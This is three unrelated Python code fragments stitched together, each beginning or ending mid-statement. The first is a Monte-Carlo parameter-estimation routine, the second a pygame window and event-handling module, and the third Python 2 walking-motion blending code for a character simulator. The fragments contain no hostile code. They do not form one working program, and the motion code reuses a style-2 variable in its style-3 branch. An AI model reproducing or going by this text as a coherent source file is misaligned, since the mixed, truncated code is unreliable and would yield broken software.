archipelago_kwargs=archipelago_kwargs,
atol_islands=atol_islands,
rtol_islands=rtol_islands,
n_islands=n_islands,
handle_CVodeError=handle_CVodeError,
loss_calculator=loss_calculator,
)
return pandas.DataFrame.from_dict(_estimate)
_estimate_batches = []
session_id = int(time.monotonic())
for i in range(1, jobs_to_save+1):
curr_memory_share = psutil.virtual_memory().percent/100
if curr_memory_share > max_memory_share:
print(f'Cannot run MC estimation job due to low memory: {(1-curr_memory_share)*100:.2f} % free memory left')
else:
_estimate_batch = self._estimate_parallel_MC_sampling(
unknowns=unknowns,
measurements=measurements,
bounds=bounds,
mc_samples=mc_samples,
reuse_errors_as_weights=reuse_errors_as_weights,
metric=metric,
report_level=report_level,
optimizers=optimizers,
optimizers_kwargs=optimizers_kwargs,
rel_pop_size=rel_pop_size,
evolutions=evolutions,
archipelago_kwargs=archipelago_kwargs,
atol_islands=atol_islands,
rtol_islands=rtol_islands,
n_islands=n_islands,
handle_CVodeError=handle_CVodeError,
loss_calculator=loss_calculator,
)
_filename = f'{self.model_name}_MC-sample-estimates_session-id-{session_id}_job-{i}.xlsx'
_df = pandas.DataFrame.from_dict(_estimate_batch)
_estimate_batches.append(_df)
_df.to_excel(_filename)
if report_level > 0:
print(f'Current memory usage is {psutil.virtual_memory().percent:.2f} %.\nSaved results of job #{i} to file: {_filename}\n')
return pandas.concat(_estimate_batches, ignore_index=True)
def _estimate_parallel_MC_sampling(self,
unknowns:list,
measurements:List[Measurement],
bounds:List[Tuple],
mc_samples:int=25,
reuse_errors_as_weights:bool=True,
metric:str='negLL',
report_level:int=0,
optimizers:List[str]='de1220',
optimizers_kwargs:List[dict]={},
rel_pop_size:float=10.0,
evolutions:int=25,
archipelago_kwargs:dict={},
atol_islands:float=None,
rtol_islands:float=1e-6,
n_islands:int=4,
handle_CVodeError:bool=True,
loss_calculator:LossCalculator=LossCalculator,
) -> dict:
"""
Performs Monte-Carlo sampling from measurements to create new measurements, according to the statitical distribution of the respective Measurement objects.
For each newly created measurement, the requested unknowns (parameters) are estimated, resulting in an empirical distribution of parameter values.
these empirical distributions for the parameters can be assessed for uncertainties and correlations.
For each MC sample, a parallel estimation procedure is carried out, for details see methods `estimate_parallel` and `estimate_parallel_continued`.
Depending on the available number of CPUs on your machine, these estimation procedure are run in parallel.
The selection of suitable hyperparameters, e.g. which optimizers, etc., use method `estimate_parallel` and refer to corresponding Jupyter notebooks.
NOTE: To increase the number of MC samples to an arbiratry high number, run this method several times and store intermediate results.
Afterwards, these can be merged.
NOTE: This method puts considerable computational load on your machine.
Arguments
---------
unknowns : dict or list
The parameters to be estimated. Can be any of the model parameters, initial values or observation parameters.
measurements : List[Measurement]
The measurements from which the parameters are to be estimated.
bounds : List[tuple]
List of tuples (lower, upper), one tuple for each parameter. Must be provided when using the global optimizer.
Default is None.
Keyword arguments
-----------------
mc_samples : int
The number of MC samples that shall be drawn from the measurement data.
Default is 25.
reuse_errors_as_weights : bool
Uses the measurement errors as weights for each set of measurement samples drawn.
Default is True.
metric : str
The metric according to which the loss to be minimized is calculated.
Can be one of, e.g. `negLL` (negative log-likelihood), 'SS' (sum of squares), or `WSS` (weighted sum of squares).
Default is `negLL`, which implies that the corresponding Measurement objects are accordingly specified.
report_level : int
Enables informative output about the estimation process.
Default is 0, which is no output.
1 = Prints a dot for each processing batch, the total runtime and the ratio of samples that reached convergence.
2 = Prints likewise for 1, but with more information on each batch.
3 | |
<filename>my_pygame/window.py
# -*- coding: Utf-8 -*
# pylint: disable=too-many-lines
import os
import sys
import configparser
from typing import Callable, Any, Union, Optional, Sequence
from contextlib import contextmanager
from functools import wraps
import pygame
from .theme import ThemeNamespace
from .drawable import Drawable, Animation
from .focusable import Focusable
from .text import Text
from .list import DrawableList
from .grid import Grid, GridCell
from .joystick import JoystickList
from .keyboard import Keyboard
from .cursor import Cursor
from .clock import Clock
from .colors import BLACK, WHITE, BLUE
from .resources import Resources
from .multiplayer import ServerSocket, ClientSocket
from .path import set_constant_file
def set_value_in_range(value: float, min_value: float, max_value: float) -> float:
if value < min_value:
value = min_value
elif value > max_value:
value = max_value
return value
class WindowExit(BaseException):
pass
class WindowCallback:
def __init__(self, master, wait_time: float, callback: Callable[..., Any], args: tuple[Any, ...], kwargs: dict[str, Any]):
self.__master = master
self.__wait_time = wait_time
self.__callback = callback
self.__args = args
self.__kwargs = kwargs
self.__clock = Clock(start=True)
def __call__(self):
if self.__clock.elapsed_time(self.__wait_time, restart=False):
self.__callback(*self.__args, **self.__kwargs)
self.kill()
def kill(self) -> None:
self.__master.remove_window_callback(self)
class WindowCallbackList(list):
def process(self) -> None:
if not self:
return
callback_list = self.copy()
for callback in callback_list:
callback()
class WindowDrawableList(DrawableList):
def __init__(self):
super().__init__()
self.__index = -1
def remove(self, *obj_list: Drawable) -> None:
super().remove(*(obj_list))
self.__update_index()
def remove_from_index(self, index: int) -> None:
super().remove_from_index(index)
self.__update_index()
def clear(self) -> None:
super().clear()
self.__index = -1
def __update_index(self) -> None:
self.__index = min(self.__index, len(self.__get_all_focusable()) - 1)
def focus_get(self) -> Focusable:
if self.__index < 0:
return None
return self.__get_all_focusable()[self.__index]
def focus_next(self) -> None:
focusable_list = self.__get_all_focusable()
if any(obj.take_focus() for obj in focusable_list):
size = len(focusable_list)
while True:
self.__index = (self.__index + 1) % size
obj = self.focus_get()
if obj.take_focus() and not isinstance(obj, GridCell):
break
self.set_focus(obj)
else:
self.set_focus(None)
def focus_obj_on_side(self, side: str) -> None:
actual_obj = self.focus_get()
if actual_obj is None:
self.focus_next()
else:
obj = actual_obj.get_obj_on_side(side)
while obj and not obj.take_focus():
obj = obj.get_obj_on_side(side)
if obj:
self.set_focus(obj)
def set_focus(self, obj: Focusable) -> None:
focusable_list = self.__get_all_focusable()
if obj is not None and obj not in focusable_list:
return
for obj_f in focusable_list:
obj_f.on_focus_leave()
if isinstance(obj, Focusable):
self.__index = focusable_list.index(obj)
obj.on_focus_set()
else:
self.__index = -1
def focus_mode_update(self) -> None:
if not Focusable.actual_mode_is(Focusable.MODE_MOUSE) and self.focus_get() is None:
self.focus_next()
@property
def index(self) -> int:
return self.__index
def __get_all_focusable(self) -> Sequence[Focusable]:
obj_list = list()
for obj in self:
if isinstance(obj, Focusable):
obj_list.append(obj)
if isinstance(obj, (DrawableList, Grid)):
if isinstance(obj, Grid):
obj_list.extend(obj.cells)
obj_list.extend(obj.find_objects(Focusable))
return obj_list
class WindowDrawable(Drawable):
pass
class WindowTransition:
def hide_actual_looping_window_start_loop(self, window) -> None:
pass
def show_new_looping_window(self, window) -> None:
pass
def hide_actual_looping_window_end_loop(self, window) -> None:
pass
def show_previous_window_end_loop(self, window) -> None:
pass
class MetaWindow(type):
__namespaces = dict()
def __init__(cls, name, bases, dict_) -> None:
type.__init__(cls, name, bases, dict_)
MetaWindow.set_namespace_decorator(cls)
def __call__(cls, *args, **kwargs):
obj = type.__call__(cls, *args, **kwargs)
MetaWindow.__namespaces[obj] = ThemeNamespace.get()
return obj
def set_namespace_decorator(cls):
for name, obj in filter(lambda item: callable(item[1]), vars(cls).items()):
setattr(cls, name, MetaWindow.namespace_decorator(obj))
@staticmethod
def namespace_decorator(func):
@wraps(func)
def wrapper(window, *args, **kwargs):
if window not in MetaWindow.__namespaces:
return func(window, *args, **kwargs)
with ThemeNamespace(MetaWindow.__namespaces[window]):
output = func(window, *args, **kwargs)
return output
return wrapper
class Window(metaclass=MetaWindow):
MIXER_FREQUENCY = 44100
MIXER_SIZE = -16
MIXER_CHANNELS = 2
MIXER_BUFFER = 512
__main_window = None
__fake_screen = pygame.Surface((0, 0))
__resources = Resources()
__default_key_repeat = (0, 0)
__text_input_enabled = False
__all_opened = list()
__actual_looping_window = None
__sound_volume = 50
__music_volume = 50
__enable_music = True
__enable_sound = True
__actual_music = None
__show_fps = False
__fps = 60
__fps_obj = None
__joystick = JoystickList()
__keyboard = Keyboard()
__default_cursor = Cursor(pygame.SYSTEM_CURSOR_ARROW)
__cursor = __default_cursor
__all_window_event_handler_dict = dict()
__all_window_key_handler_dict = dict()
__all_window_key_state_dict = dict()
__all_window_joystick_handler_dict = dict()
__all_window_joystick_state_dict = dict()
__all_window_mouse_handler_list = list()
__all_window_key_enabled = True
__server_socket = ServerSocket()
__client_socket = ClientSocket()
def __init__(self, master=None, bg_color=BLACK, bg_music=None):
self.__master = master
self.__main_clock = pygame.time.Clock()
self.__loop = False
self.__show_fps_in_this_window = True
self.__objects = WindowDrawableList()
self.__automatic_add_drawable_to_object_list = True
self.__event_handler_dict = dict()
self.__key_handler_dict = dict()
self.__key_state_dict = dict()
self.__joystick_handler_dict = dict()
self.__joystick_state_dict = dict()
self.__mouse_handler_list = list()
self.__callback_after = WindowCallbackList()
self.bg_color = bg_color
self.bg_music = bg_music
focus_event = (
pygame.KEYDOWN,
pygame.MOUSEBUTTONDOWN,
pygame.MOUSEBUTTONUP,
pygame.MOUSEMOTION,
pygame.MOUSEWHEEL,
pygame.JOYHATMOTION
)
self.bind_multiple_event(focus_event, self.__handle_focus)
self.bind_event(pygame.KEYDOWN, self.__key_handler)
self.bind_multiple_event([pygame.JOYBUTTONDOWN, pygame.JOYAXISMOTION, pygame.JOYHATMOTION], self.__joystick_handler)
self.__key_enabled = True
self.__screenshot = None
self.__screenshot_window_callback = None
self.bind_key(pygame.K_F11, lambda event: self.screenshot())
if not Window.__fps_obj:
Window.__fps_obj = Text(color=BLUE)
@property
def main_window(self) -> bool:
return Window.__main_window is self
@staticmethod
def get_actual_window():
return Window.__actual_looping_window
@property
def joystick(self) -> JoystickList:
return Window.__joystick
@property
def keyboard(self) -> Keyboard:
return Window.__keyboard
@property
def objects(self) -> WindowDrawableList:
return self.__objects
def __setattr__(self, name, obj) -> None:
automatic_add = getattr(self, "_Window__automatic_add_drawable_to_object_list", True)
if name != "_Window__objects" and hasattr(self, "_Window__objects") and automatic_add:
if hasattr(self, name) and isinstance(getattr(self, name), DrawableList.get_valid_classes()):
self.objects.remove(getattr(self, name))
if isinstance(obj, DrawableList.get_valid_classes()) and not isinstance(obj, (WindowDrawable, WindowDrawableList)):
self.objects.add(obj)
return object.__setattr__(self, name, obj)
def __delattr__(self, name) -> None:
obj = getattr(self, name)
if isinstance(obj, DrawableList.get_valid_classes()) and name != "_Window__objects":
self.objects.remove(obj)
return object.__delattr__(self, name)
def __contains__(self, obj) -> bool:
return bool(obj in self.objects)
@contextmanager
def no_add_object_automatically(self) -> None:
try:
self.__automatic_add_drawable_to_object_list = False
yield self
finally:
self.__automatic_add_drawable_to_object_list = True
def enable_key_joy_focus(self) -> None:
self.__key_enabled = True
def disable_key_joy_focus(self) -> None:
self.__key_enabled = False
@staticmethod
def enable_key_joy_focus_for_all_window() -> None:
Window.__all_window_key_enabled = True
@staticmethod
def disable_key_joy_focus_for_all_window() -> None:
Window.__all_window_key_enabled = False
@staticmethod
def set_icon(icon: pygame.Surface) -> None:
pygame.display.set_icon(pygame.transform.smoothscale(icon, (32, 32)))
@staticmethod
def set_title(title: str) -> None:
pygame.display.set_caption(title)
@staticmethod
def iconify() -> bool:
return pygame.display.iconify()
@property
def bg_music(self) -> Union[str, None]:
return self.__bg_music
@bg_music.setter
def bg_music(self, music) -> None:
if music is None or os.path.isfile(music):
self.__bg_music = music
@property
def bg_color(self) -> pygame.Color:
return self.__bg_color
@bg_color.setter
def bg_color(self, color: pygame.Color) -> None:
self.__bg_color = pygame.Color(color) if color is not None else BLACK
@property
def loop(self) -> bool:
return self.__loop
def mainloop(self, *, transition: Optional[WindowTransition] = None,
action_before_loop: Optional[Callable[..., Any]] = None,
action_after_loop: Optional[Callable[..., Any]] = None) -> int:
self.__loop = True
Animation.enable()
if not isinstance(Window.__main_window, Window):
Window.__main_window = self
Window.__all_opened.append(self)
Window.__default_cursor.set()
previous_window = Window.get_actual_window()
if isinstance(transition, WindowTransition) and isinstance(previous_window, Window):
transition.hide_actual_looping_window_start_loop(previous_window)
if callable(action_before_loop):
action_before_loop()
self.place_objects()
self.set_grid()
self.on_start_loop()
if isinstance(transition, WindowTransition) and self.__loop:
transition.show_new_looping_window(self)
while self.__loop:
self.handle_fps()
Window.__actual_looping_window = self
self.__handle_bg_music()
self.__handle_cursor()
self.__callback_after.process()
if Window.__all_window_key_enabled and self.__key_enabled:
self.objects.focus_mode_update()
self.keyboard.update()
self.update()
self.draw_and_refresh()
self.event_handler()
self.__callback_after.clear()
if self.main_window:
Window.__main_window = None
if pygame.get_init():
if isinstance(transition, WindowTransition):
transition.hide_actual_looping_window_end_loop(Window.get_actual_window())
if callable(action_after_loop):
action_after_loop()
if isinstance(transition, WindowTransition) and isinstance(previous_window, Window):
transition.show_previous_window_end_loop(previous_window)
elif callable(action_after_loop):
action_after_loop()
return 0
def stop(self, force=False, sound=None) -> None:
if not self.__loop:
return
self.__loop = False
if sound:
self.play_sound(sound)
if force or self.main_window or self.__actual_looping_window is not self:
Animation.disable()
self.on_quit()
self.set_focus(None)
Window.__all_opened.remove(self)
if force and not self.main_window and isinstance(Window.__main_window, Window):
Window.__main_window.stop()
elif self.main_window:
for window in list(Window.__all_opened):
Animation.disable()
window.stop()
Animation.enable()
if not Window.__all_opened and pygame.get_init():
Window.stop_connection()
pygame.quit()
raise WindowExit
def close(self) -> None:
self.stop(force=True)
def on_quit(self) -> None:
pass
def on_start_loop(self) -> None:
pass
def update(self) -> None:
pass
def place_objects(self) -> None:
pass
def set_grid(self) -> None:
pass
def draw_screen(self, show_fps=True) -> None:
if isinstance(self.__master, Window):
self.__master.draw_screen(show_fps=False)
else:
self.surface.fill(self.bg_color)
self.objects.draw(self.surface)
if Window.__show_fps is True and show_fps and self.__show_fps_in_this_window:
Window.__fps_obj.draw(self.surface)
if isinstance(self.__screenshot, Drawable):
self.__screenshot.draw(self.surface)
pygame.draw.rect(self.surface, WHITE, self.__screenshot.rect, width=3)
def refresh(self, pump=False) -> None:
screen = pygame.display.get_surface()
screen.blit(pygame.transform.smoothscale(self.surface, screen.get_size()), (0, 0))
pygame.display.flip()
if pump:
repost_event = list[pygame.event.Event]()
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.close()
else:
repost_event.append(event)
for event in repost_event:
pygame.event.post(event)
def draw_and_refresh(self, show_fps=True, pump=False) -> None:
self.draw_screen(show_fps=show_fps)
self.refresh(pump=pump)
@staticmethod
def set_fps(framerate: int) -> None:
Window.__fps = int(framerate)
@staticmethod
def get_fps() -> int:
return Window.__fps
@staticmethod
def show_fps(status: bool, **kwargs) -> None:
Window.__show_fps = bool(status)
if kwargs:
Window.move_fps_object(**kwargs)
@staticmethod
def config_fps_obj(**kwargs) -> None:
Window.__fps_obj.config(**kwargs)
@staticmethod
def move_fps_object(**kwargs) -> None:
Window.__fps_obj.move(**kwargs)
@staticmethod
def fps_is_shown() -> bool:
return Window.__show_fps
def handle_fps(self) -> None:
self.__main_clock.tick(Window.__fps)
if Window.__show_fps:
Window.__fps_obj.message = f"{round(self.__main_clock.get_fps())} FPS"
def show_fps_in_this_window(self, status: bool) -> None:
self.__show_fps_in_this_window = bool(status)
def show_all(self, without=list()) -> None:
for obj in filter(lambda obj: obj not in without, self.objects):
obj.show()
for obj in without:
obj.hide()
def hide_all(self, without=list()) -> None:
for obj in filter(lambda obj: obj not in without, self.objects):
obj.hide()
for obj in without:
obj.show()
def event_handler(self) -> None:
for key_state_dict in [Window.__all_window_key_state_dict, self.__key_state_dict]:
for key_value, callback_list in key_state_dict.items():
for callback in callback_list:
callback(key_value, self.keyboard.is_pressed(key_value))
mouse_pos = self.map_cursor_position(pygame.mouse.get_pos())
for mouse_handler_list in [Window.__all_window_mouse_handler_list, self.__mouse_handler_list]:
for callback in mouse_handler_list:
callback(mouse_pos)
for joystick_state_dict in [Window.__all_window_joystick_state_dict, self.__joystick_state_dict]:
for device_index in | |
0:
if old_style[0] != style[0]:
#need a blending
if old_style[0] == 1:
if which_foot[0] == 0:
motion_info[0].append('left_left_style1')
motion_info[0].append('left_left_normal')
blend_motion = ymb.getBlendedNextMotion2(left_left_style1, left_left_normal,left_left_style1[0],None)
else :
motion_info[0].append('right_right_style1')
motion_info[0].append('right_right_normal')
blend_motion = ymb.getBlendedNextMotion2(right_right_style1, right_right_normal,right_right_style1[0],None)
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
elif old_style[0] == 2:
if which_foot[0] == 0:
motion_info[0].append('left_left_style2')
motion_info[0].append('left_left_normal')
blend_motion = ymb.getBlendedNextMotion2(left_left_style2, left_left_normal,left_left_style2[0],None)
else :
motion_info[0].append('right_right_style2')
motion_info[0].append('right_right_normal')
blend_motion = ymb.getBlendedNextMotion2(right_right_style2, right_right_normal,right_right_style2[0],None)
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
elif old_style[0] == 3:
if which_foot[0] == 0:
motion_info[0].append('left_left_style3')
motion_info[0].append('left_left_normal')
blend_motion = ymb.getBlendedNextMotion2(left_left_style3, left_left_normal,left_left_style2[0],None)
else :
motion_info[0].append('right_right_style3')
motion_info[0].append('right_right_normal')
blend_motion = ymb.getBlendedNextMotion2(right_right_style3, right_right_normal,right_right_style3[0],None)
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
#left_foot
if which_foot[0] == 0:
if old_speed[0] != speed[0]:
blend1 = ymb.getBlendedNextMotion2(left_left_normal, left_left_fast,left_left_normal[0],0.1*old_speed[0])
blend2 = ymb.getBlendedNextMotion2(left_left_normal, left_left_fast,left_left_normal[0],0.1*speed[0])
blend_motion = ymb.getBlendedNextMotion2( blend1,blend2,blend1[0],None)
motion_info[0].append('left_left_normal')
motion_info[0].append('left_left_fast')
motion_info[0].append(0.1*old_speed[0])
motion_info[0].append(0.1*speed[0])
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
if speed[0]== 0 :
motion_info[1].append('left_right_normal')
next_motion[:] = left_right_normal.copy()
elif speed[0] == 10:
motion_info[1].append('left_right_fast')
next_motion[:] = left_right_fast.copy()
else:
motion_info[1].append('left_right_normal')
motion_info[1].append('left_right_fast')
motion_info[1].append(0.1*speed[0])
next_motion[:] = ymb.getBlendedNextMotion2(left_right_normal, left_right_fast,left_right_normal[0],0.1*speed[0])
which_foot[0] = 1
# right_foot
else:
if old_speed[0] != speed[0]:
blend1 = ymb.getBlendedNextMotion2(right_right_normal, right_right_fast,right_right_normal[0],0.1*old_speed[0])
blend2 = ymb.getBlendedNextMotion2(right_right_normal, right_right_fast,right_right_normal[0],0.1*speed[0])
blend_motion = ymb.getBlendedNextMotion2( blend1,blend2,blend1[0],None)
# tmp_motion = ymb.getStitchedNextMotion(blend_motion,result_motion[finished_frame-1],10)
motion_info[0].append('right_right_normal')
motion_info[0].append('right_right_fast')
motion_info[0].append(0.1*old_speed[0])
motion_info[0].append(0.1*speed[0])
# result_motion.extend(ymb.getStitchedNextMotion(blend_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(blend_motion,result_motion[last_time_frame-1 ],start_motion[0][0], angle_offset[0]*mm.RAD,TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
if speed[0]== 0 :
motion_info[1].append('right_left_normal')
next_motion[:] = right_left_normal.copy()
elif speed[0] == 10:
motion_info[1].append('right_left_fast')
next_motion[:] = right_left_fast.copy()
else:
motion_info[1].append('right_left_normal')
motion_info[1].append('right_left_fast')
motion_info[1].append(0.1*speed[0])
next_motion[:] = ymb.getBlendedNextMotion2(right_left_normal, right_left_fast,right_left_normal[0],0.1*speed[0])
which_foot[0] = 0
# angle change
else:
relative_angle[0] = 0
pre_velocity[0] = velocity[0]
if cross_vector[0] > 0 :
print tmp_angle[0], 'left'
if which_foot[0] == 1:
# result_motion.extend(ymb.getStitchedNextMotion(right_left_normal,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion(right_left_normal,result_motion[last_time_frame-1],TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
if tmp_angle[0] < 90:
motion_info[1].append('left_right_normal_long')
motion_info[1].append('left_right_90_leftturning')
motion_info[1].append((tmp_angle[0])/90.0)
next_motion[:] = ymb.getBlendedNextMotion2(left_right_normal_long,left_right_90_leftturning,left_right_normal_long[0],(tmp_angle[0])/90.0)
elif tmp_angle[0] == 90:
motion_info[1].append('left_right_90_leftturning')
next_motion[:] = left_right_90_leftturning.copy()
# elif tmp_angle[0] < 135:
# next_motion[:] = ymb.getBlendedNextMotion2(left_right_walk_90_left_motion,left_right_walk_135_left_motion,left_right_normal_long[0],(tmp_angle[0])/45.0)
elif tmp_angle[0] < 135:
motion_info[1].append('left_right_90_leftturning')
motion_info[1].append('left_right_135_leftturning')
motion_info[1].append((tmp_angle[0]-90)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(left_right_90_leftturning,left_right_135_leftturning,left_right_90_leftturning[0],(tmp_angle[0]-90)/45.0)
elif tmp_angle[0] == 135:
motion_info[1].append('left_right_135_leftturning')
next_motion[:] = left_right_135_leftturning.copy()
elif tmp_angle[0] < 180:
motion_info[1].append('left_right_135_leftturning')
motion_info[1].append('left_right_180_leftturning')
motion_info[1].append((tmp_angle[0]-135)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(left_right_135_leftturning,left_right_180_leftturning,left_right_135_leftturning[0],(tmp_angle[0]-135)/45.0)
else:
motion_info[1].append('left_right_180_leftturning')
next_motion[:] = left_right_180_leftturning.copy()
which_foot[0] = 1
#left_right_45_leftturning
next_angle_offset += tmp_angle[0]
else:
print tmp_angle[0], 'right'
if which_foot[0] == 0:
# result_motion.extend(ymb.getStitchedNextMotion(left_right_normal,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion(left_right_normal,result_motion[last_time_frame-1],TRANSITION_LENGTH, TRANSITION_FUNC))
last_time_frame = len(result_motion)
if tmp_angle[0] < 90:
motion_info[1].append('right_left_normal_long')
motion_info[1].append('right_left_90_rightturning')
motion_info[1].append((tmp_angle[0])/90.0)
next_motion[:] = ymb.getBlendedNextMotion2(right_left_normal_long,right_left_90_rightturning,right_left_normal_long[0],(tmp_angle[0])/90.0)
elif tmp_angle[0] == 90:
motion_info[1].append('right_left_90_rightturning')
next_motion[:] = right_left_90_rightturning.copy()
# elif tmp_angle[0] < 135:
# next_motion[:] = ymb.getBlendedNextMotion2(left_right_walk_90_left_motion,left_right_walk_135_left_motion,left_right_normal_long[0],(tmp_angle[0])/45.0)
elif tmp_angle[0] < 135:
motion_info[1].append('right_left_90_rightturning')
motion_info[1].append('right_left_135_rightturning')
motion_info[1].append((tmp_angle[0]-90)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(right_left_90_rightturning,right_left_135_rightturning,right_left_90_rightturning[0],(tmp_angle[0]-90)/45.0)
elif tmp_angle[0] == 135:
motion_info[1].append('right_left_135_rightturning')
next_motion[:] = right_left_135_rightturning.copy()
elif tmp_angle[0] < 180:
motion_info[1].append('right_left_135_rightturning')
motion_info[1].append('right_left_180_rightturning')
motion_info[1].append((tmp_angle[0]-135)/45.0)
next_motion[:] = ymb.getBlendedNextMotion2(right_left_135_rightturning,right_left_180_rightturning,right_left_135_rightturning[0],(tmp_angle[0]-135)/45.0)
else:
motion_info[1].append('right_left_180_rightturning')
next_motion[:] = right_left_180_rightturning.copy()
which_foot[0] = 0
next_angle_offset += -tmp_angle[0]
pre_angle[0] = 0
viewer.objectInfoWnd.angle_value_input.value(0)
viewer.objectInfoWnd.angle_value_slider.value(0)
# if draw_angle[0] >= 360:
# draw_angle[0] = draw_angle[0] -360
# tmp_motion.extend(ymb.getStitchedNextMotion(next_motion,tmp_motion[-1],10))
# result_motion.extend(ymb.getStitchedNextMotion(next_motion,result_motion[last_time_frame-1],10))
result_motion.extend(ymb.getStitchedNextMotion_y_angle(next_motion,result_motion[last_time_frame-1], start_motion[0][0], angle_offset[0]*mm.RAD, 10))
angle_offset[0] += next_angle_offset
for finished_frame in range(finished_frame,len(result_motion)+1):
# print style[0]
which_style[finished_frame-1] = style[0]
viewer.setMaxFrame(10000)
# viewer.setMaxFrame(len(result_motion))
total_frame_num[0] = len(result_motion)
old_speed[0] = speed[0]
old_style[0] = style[0]
#
#
return result_motion[call_time_frame:], motion_info
pre_angle = [0]
moving_angle = ['off']
def style_but_cb(which):
style[0] = which
def speed_but_cb(which):
speed[0] = which
def val_slider_handle(which):
moving_angle[0] = which
# print '1: ' ,moving_angle[0]
if moving_angle[0]== 'on':
relative_angle[0] = 0
elif moving_angle[0]== 'off':
relative_angle[0] = 1
def angle_but_cb_handle(which):
angle[0] = which
draw_angle[0] -= pre_angle[0]
draw_angle[0] += angle[0]
pre_angle[0] = angle[0]
def angle_but_cb(which):
# relative_angle[0] = 1
# angle[0] = which
# draw_angle[0] += angle[0]
# if draw_angle[0] >= 360:
# draw_angle[0] = draw_angle[0] -360
if which == 270:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(-FORCE_SIZE[0], 0, 0), spine))
elif which== 90:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(FORCE_SIZE[0], 0, 0), spine))
elif which == 180:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(0, 0, -FORCE_SIZE[0]), spine))
elif which == 0:
forceInfos.append(ForceInfo(viewer.getCurrentFrame(), FORCE_DURATION, mm.v3(0, 0, FORCE_SIZE[0]), spine))
# else:
#
# relative_angle[0] = 1
# angle[0] = which
# draw_angle[0] -= pre_angle[0]
# draw_angle[0] += angle[0]
# pre_angle[0] = angle[0]
FORCE_SIZE = [LARGE_FORCE_SIZE]
x_axis = [0]
z_axis = [0]
def event_handle(which_key):
#6 : speed up 7: speed down
if which_key == 1:
# print speed
speed[0]+= 2
if speed[0] > 10:
speed[0] = 0
elif which_key == 2:
# print speed
speed[0]-= 2
if speed[0] < 0:
speed[0] = 10
# external force
elif which_key == 'a':
x_axis[0] += 0.3
elif which_key == 'd':
x_axis[0] -= 0.3
elif which_key == 'w':
z_axis[0] += 0.3
elif which_key == 's':
z_axis[0] -= 0.3
elif which_key == 'l':
if FORCE_SIZE[0]== LARGE_FORCE_SIZE:
print '2'
FORCE_SIZE[0]= SMALL_FORCE_SIZE
# arrow_force.ratio = 0.01
else:
print '1'
FORCE_SIZE[0]=LARGE_FORCE_SIZE
# arrow_force.ratio = 0.005
def make_motion_seq(now_frame_num):
if now_frame_num > 0 :
make_motion_seq_after_0_frame(now_frame_num)
root_frame = [None]
def make_motion_seq_after_0_frame(now_frame_num):
root_frame[0] = result_motion[now_frame_num-1].getJointFrame(0)
if SIMULATION_ON:
direction[0] = controlModel.getJointPositionGlobal(0)
else:
# viewer.setCameraTarget(result_motion[now_frame_num-1].getJointPositionGlobal(0))
direction[0] = result_motion[now_frame_num-1].getJointPositionGlobal(0)
viewer.motionViewWnd.glWindow.floor_axis[0] = direction[0]
arrow_origin = direction[0]
x = -0.7
z = 0
if store_angle_per_frame[now_frame_num-1] == -1:
store_angle_per_frame[now_frame_num-1] = draw_angle[0]
x1 = z*math.sin(store_angle_per_frame[now_frame_num-1]*math.pi/180) + x*math.cos(store_angle_per_frame[now_frame_num-1]*math.pi/180)
z1 = z*math.cos(store_angle_per_frame[now_frame_num-1]*math.pi/180) - x*math.sin(store_angle_per_frame[now_frame_num-1]*math.pi/180)
tmp[0] = [x1,0,z1]
arrow_origin = direction[0] + tmp
direction[0] = arrow_origin[0]
direction[0][1] = ARROW_HEIGHT
if store_speed_per_frame[now_frame_num-1] == -1:
store_speed_per_frame[now_frame_num-1] = speed[0]
x = -(store_speed_per_frame[now_frame_num-1]*0.1 + 0.5)
z = 0
x1 = z*math.sin((store_angle_per_frame[now_frame_num-1])*math.pi/180) + x*math.cos((store_angle_per_frame[now_frame_num-1])*math.pi/180)
z1 = z*math.cos((store_angle_per_frame[now_frame_num-1])*math.pi/180) - x*math.sin((store_angle_per_frame[now_frame_num-1])*math.pi/180)
velocity[0] = [x1,0,z1]
if now_frame_num == 1 :
pre_velocity[0] = velocity[0]
velocity_root[0] = result_motion.getJointVelocityGlobal(0, now_frame_num-1)
velocity_root[0] = pre_velocity[0]
velocity_root[0][1] = velocity[0][1]
dot_product = velocity[0][0] *velocity_root[0][0] +velocity[0][1] *velocity[0][1] +velocity[0][2] *velocity_root[0][2]
len1 = math.sqrt(velocity[0][0] *velocity[0][0] +velocity[0][1] *velocity[0][1] +velocity[0][2] *velocity[0][2])
len2 = math.sqrt(velocity_root[0][0] *velocity_root[0][0] +velocity[0][1] *velocity[0][1] +velocity_root[0][2] *velocity_root[0][2])
